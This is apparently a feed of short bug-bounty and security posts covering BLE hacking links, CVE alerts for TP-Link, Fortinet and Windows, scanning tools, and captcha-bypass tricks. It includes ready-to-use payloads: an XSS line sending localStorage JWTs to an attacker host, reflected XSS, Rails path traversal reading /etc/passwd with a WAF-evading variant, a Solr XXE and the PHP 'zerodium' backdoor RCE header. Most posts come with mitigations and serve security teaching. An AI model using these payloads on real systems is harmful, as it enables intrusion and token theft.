📮 Pentesting Bluetooth: The Practical Guide to Hacking Bluetooth Low Energy

1. https://blog.attify.com/the-practical-guide-to-hacking-bluetooth-low-energy/
2. https://pentestpartners.com/security-blog/introduction-to-bluetooth-low-energy/
3. https://book.hacktricks.xyz/todo/radio-hacking/pentesting-ble-bluetooth-low-energy

#infosec #bluetooth

🚀 Captcha Bypass Techniques for Efficient Server Testing 🚀

Bypassing captchas can make server testing and automation easier. It's important to note that this is for testing purposes only, and the goal isn’t to compromise security, but to optimize workflows. Here are some methods to consider:

🔑 1. Parameter Manipulation

Omit Captcha Parameter: Skip the captcha parameter and try switching the HTTP method (e.g., POST → GET) or the data format (form data → JSON).
Submit Empty Captcha: Send the captcha parameter with no value.

🔍 2. Value Extraction & Reuse

Inspect Source Code: Look for captcha values hidden in the page’s source code.
Analyze Cookies: Check cookies for stored captcha values that might be reused.
Reuse Old Captcha: If a captcha was solved successfully, try using the same value. (Note: It may expire.)
Session Manipulation: Try reusing the same captcha value across different sessions or use the same session ID.

🤖 3. Automation & Recognition

Solve Math Captchas: Automate the calculation process for captchas involving simple math.
Image Recognition:
For image-based captchas, identify unique images (use MD5 hashes if limited).
Use OCR (Optical Character Recognition) tools like Tesseract to automate reading characters from images.

⚙️ 4. Additional Techniques

Rate Limit Testing: See if there are submission limits and find ways to bypass or reset them.
Use Third-Party Services: Leverage captcha-solving APIs or services.
Session & IP Rotation: Rotate your session IDs and IP addresses frequently to avoid detection.
User-Agent Manipulation: Change the User-Agent and headers to simulate different browsers or devices.
Audio Captcha Solving: Use speech-to-text services for audio captchas.

💡 Note: These techniques are meant for testing and automating workflows, not for bypassing security measures maliciously. Always ensure your actions are ethical and legal. 🔒

#bypass #Captcha #tricks #hacktricks

🚨 TP-Link Vulnerability CVE-2024-54887: Remote Code Execution 🚨

A critical vulnerability in TP-Link devices (CVE-2024-54887) has been discovered, allowing attackers to remotely execute code. This flaw could expose users to significant security risks if left unaddressed. Here’s

everything you need to know:

💡 What is CVE-2024-54887?

This vulnerability affects TP-Link routers and smart home devices, and it allows attackers to exploit a remote code execution (RCE) flaw. If exploited, an attacker can gain full control over the affected device.

⚠️ Risk of Exploitation

Remote Code Execution (RCE): Attackers can remotely run arbitrary code on the device, allowing them to gain control and potentially compromise the entire network.
Full Device Compromise: With RCE, an attacker can steal sensitive data, alter device configurations, or launch further attacks within the local network.
Impact on IoT Devices: The vulnerability affects a range of TP-Link devices, including routers and IoT products, which could be targeted for botnet attacks, espionage, or other malicious activities.

🛠 How Does the Exploit Work?

Exploiting the Vulnerability: Attackers can send specially crafted requests to the affected TP-Link devices, bypassing authentication mechanisms and executing arbitrary commands.
Exploitation via HTTP Requests: The vulnerability is triggered by manipulating HTTP requests to the vulnerable endpoint. Once triggered, it grants the attacker the ability to execute malicious commands on the device.

💥 Proof of Concept (PoC)

Exploiting the Bug: A PoC exploit has been released, demonstrating how easily this vulnerability can be triggered. It shows how an attacker can interact with a vulnerable device remotely and execute arbitrary code.
Code Execution Risk: The PoC highlights how the exploit can bypass authentication and escalate privileges, potentially leading to device takeover and exploitation.

🛡 How to Protect Yourself

Update Your Firmware:
TP-Link has released a patch to fix the vulnerability. Ensure your device is updated to the latest firmware version that addresses CVE-2024-54887.

Disable Remote Management:
Disable remote management features on your TP-Link device if you don’t need them, as this reduces the attack surface for potential exploits.

Network Segmentation:
Use network segmentation to isolate IoT devices from critical systems, making it harder for attackers to move laterally within your network.

Monitor Network Traffic:
Watch for unusual network traffic patterns, especially HTTP requests targeting your device’s IP, which may indicate exploitation attempts.

Use Strong Authentication:
Ensure strong passwords and two-factor authentication (2FA) are enabled for device access, reducing the chance of successful attacks.

📝 Key Takeaway:

The TP-Link vulnerability CVE-2024-54887 poses serious RCE risks to affected devices. Immediate patching, disabling remote management, and securing network access are critical steps to mitigate potential exploitation.

ZoomEye :

app="TP-LINK TL-WR940N WAP httpd"
6k+ results are found on ZoomEye.

ZoomEye Link: https://zoomeye.ai

Refer: https://securityonline.info/

#RCE #Cyberspacemapping #cybersecurity #ZoomEye #infosec2024

💡Injectra : A Python Tool for Seamlessly Injecting Custom Payloads into Files Using Magic Numbers

GitHub: https://github.com/AnonKryptiQuz/Injectra

If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with:

`Accept: ../../../../../../../../../../etc/passwd{{` 

#bugbountytips

If the server is deemed to be vulnerable, but a WAF is present:

`../../../../../../e*c/p*s*d{{`

🚀 HExHTTP: Advanced HTTP Header Testing Tool 🚀

HExHTTP is a Python-based tool designed to analyze HTTP headers for vulnerabilities and identify unusual behaviors in web applications. It's ideal for security researchers and penetration testers.

🌟 Features:

- Perform in-depth tests on HTTP headers.
- Detect potential vulnerabilities and security misconfigurations.
- Support for custom headers, user agents, authentication, and more.

📥 Get Started:

Check out the full details and installation
🔗 https://github.com/c0dejump/HExHTTP

#CyberSecurity #PenTesting #HTTPHeaders #HExHTTP #BugBounty #EthicalHacking #WebSecurity #PythonTools #InfoSec #VulnerabilityTesting

⚠️ Alert ⚠️

CVE-2025-21298 : Windows OLE Remote Code Execution Vulnerability

🔥PoC : https://github.com

🧐 Deep Dive : https://redcytadel.com

🔗 Hunter Link:https://hunter.how

🔍 Query

HUNTER :

product.name="Outlook Web App"

FOFA :

product="Microsoft-Outlook"

📰 Refer:https://securityonline.info

#WINDOWS #Outlook #hunterhow #infosec #infosecurity #OSINT #Vulnerability

A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.

Use shell globbing / wildcard expansion. Here is an example

cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how?

Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.

/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."

/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d

#bugbountytips #hacking

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

🚀 Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#bugbountytips #BugBounty #payload #cybersecurity

🔍 Bystander: Passive Web Vulnerability Detection Tool 🔍

Overview: Bystander is a Chrome extension that passively monitors network requests to identify potential web vulnerabilities directly within your browser. As you browse, Bystander alerts you to any detected security issues, enhancing your web security awareness.

Key Features:

- Vulnerability Detection: Identifies actual web vulnerabilities such as Cross-Site Request Forgery (CSRF) and Clickjacking.

- Code Sink Alerts: Detects potential code injection points, including NoSQL Injection (NoSQLi), Server-Side Template Injection (SSTI), and Server-Side Includes (SSI).

- API Token Leakage: Alerts you if API tokens are exposed during your browsing sessions.

- Personal Identifiable Information (PII) Monitoring: Notifies you of potential leaks of sensitive information like PAN numbers or hash disclosures.

- Insight Gathering: Observes and reports on staging domains, admin dashboards, and other critical elements in frontend code and network traffic.

Installation Steps:

- Download: Clone or download the Bystander repository from GitHub.

- Load Extension: In your Chromium-based browser (e.g., Chrome), navigate to Settings > Extensions and enable Developer Mode.

- Add Bystander: Click on "Load unpacked" and select the Bystander folder you downloaded.

For more detailed information and to access the source code, visit the Bystander GitHub repository:
https://github.com/itsdivyanshjain/Bystander

See an apache solr GET/POST to /select ?

Set the 'q' parameter to the following for an XXE injection:

/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'}

#infosec #cybersec #bugbountytips

If you find PHP 8.1.0-dev then try RCE & SQLi

User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id'); 

#bugbounty #bugbountytips #rce #sqli #cybersecurity

CVE-2024-9047: WordPress File Upload plugin for WordPress is vulnerable to a Path Traversal vulnerability in all versions up to, and including, 4.24.11 via the wfu_file_downloader.php...
exploitfinder.com/dbexploit/expl…

⛏️ Find Leaked Credentials Using Google Chrome dev Tools (The Best Way)

🔗 https://github.com/h4x0r-dz/Leaked-Credentials/

#bugbountytips #bugbounty #infosec #hacker #hacking

🚨CVE-2024-55591: Fortinet FortiOS Authentication Bypass Proof of Concept

🔗: https://github.com/watchtowrlabs...

🚨 Critical Vulnerability Alert: Fortinet FortiOS Authentication Bypass (CVE-2024-55591) 🚨

**Overview:**

A significant security flaw has been identified in Fortinet's FortiOS and FortiProxy systems, allowing remote attackers to gain super-admin privileges without proper authentication. This vulnerability is actively being exploited in the wild. ([FortiGuard](https://www.fortiguard.com/psirt/FG-IR-24-535))

**Technical Details:**

- **Vulnerability ID:** CVE-2024-55591
- **Affected Products:**

- FortiOS versions 7.0.0 through 7.0.16
- FortiProxy versions 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12

Impact:

Allows attackers to gain super-admin privileges via crafted requests to the Node.js websocket module. ([NVD](https://nvd.nist.gov/vuln/detail/cve-2024-55591))

**Proof of Concept:**

A proof-of-concept (PoC) exploit has been released by watchTowr Labs, demonstrating how this vulnerability can be leveraged to execute commands with super-admin privileges. The PoC is available on GitHub: ([GitHub](https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591)

**Mitigation:**

Fortinet has acknowledged the issue and is expected to release patches. Administrators are advised to monitor official Fortinet communications for updates and apply patches promptly. In the meantime, consider restricting access to management interfaces and implementing network segmentation to mitigate potential exploitation.

quick Linux tip 💡

In Linux, you can use the pgrep command to find the PID of a certain process based on its name, pattern, or other criteria.

$pgrep name

You can also use pidof, but it only works with exact binary names and doesn't support pattern matching.

follow us for more great tips! 🐧😎

#cybersecurity #BugBounty #bugbountytips #linuxtips

🌟 bugbountytip

🌟 403 Sucessfull bypass ✅

🌟 add ../ between two UUID and bypass 403

#BugBounty #bugbountytips #BugHunter #bug #web2 #web3 #ethicalhacking

🚨 XSS Payload : Stealing JWT from Local Storage 🚨

A malicious XSS payload can be used to extract JSON Web Tokens (JWTs) stored in localStorage and send them to an attacker-controlled server. Here's a simple yet dangerous example:

<img src='https://<attacker-server>/yikes?jwt='+JSON.stringify(localStorage);'--!>

🛠 How It Works:

This payload injects an <img> tag into a vulnerable webpage.
The src attribute is set to an attacker's server, appending the contents of localStorage (which may contain JWTs or sensitive data).
When executed, the victim's browser sends their JWTs to the attacker's server.

🔥 Why Is This Dangerous?

Attackers can hijack sessions and gain unauthorized access.
Sensitive tokens (JWT, API keys) can be stolen and misused.
If exploited on an admin panel, attackers might escalate privileges.

🛡 How to Prevent It?

✔️ Use HTTP-Only Cookies: Store authentication tokens in cookies with the HttpOnly and Secure flags to prevent JavaScript access.

✔️ Implement CSP (Content Security Policy): Restrict inline scripts and unauthorized domains.

✔️ Sanitize User Input: Use libraries like DOMPurify to prevent injecting malicious HTML.

✔️ Validate & Escape Data Properly: Ensure user inputs are validated before rendering.

🚀 Stay Secure 🔐

#CyberSecurity #XSS #WebSecurity #EthicalHacking #BugBounty #JWT #PenTesting #InfoSec

🧨 Reflected XSS (RXSS) Payload Alert! 🧨

Reflected XSS (RXSS) vulnerabilities allow attackers to inject and execute malicious scripts by crafting special payloads. Here's a custom payload that triggers a prompt pop-up when injected into a vulnerable web application

💣 Custom Payload:

"></a></td></tr></table><script>prompt('ijustcopypastelikeanoob');</script></html>//

🔥 How It Works:

- Breaks out of HTML structure using "></a></td></tr></table>.

- Injects a <script> tag that executes JavaScript.

- Triggers a prompt function, confirming code execution.

⚠️ Potential Dangers:

Can be modified to steal cookies, localStorage, or session tokens.
Attackers can perform actions on behalf of users (CSRF-like behavior).
Could be used to deface websites, spread malware, or execute phishing attacks.

🛡 How to Prevent RXSS?

✔️ Sanitize & Escape User Input: Remove or encode characters like <, >, ", '.

✔️ Use CSP (Content Security Policy): Restrict inline scripts and only allow trusted domains.

✔️ Validate Input on Server & Client Side: Never trust user-generated data.

✔️ Use Security Libraries: Implement DOMPurify or similar libraries to filter untrusted input.

🚀 Stay Safe ! 🔐

#CyberSecurity #RXSS #XSS #WebSecurity #BugBounty #EthicalHacking #InfoSec #PenTesting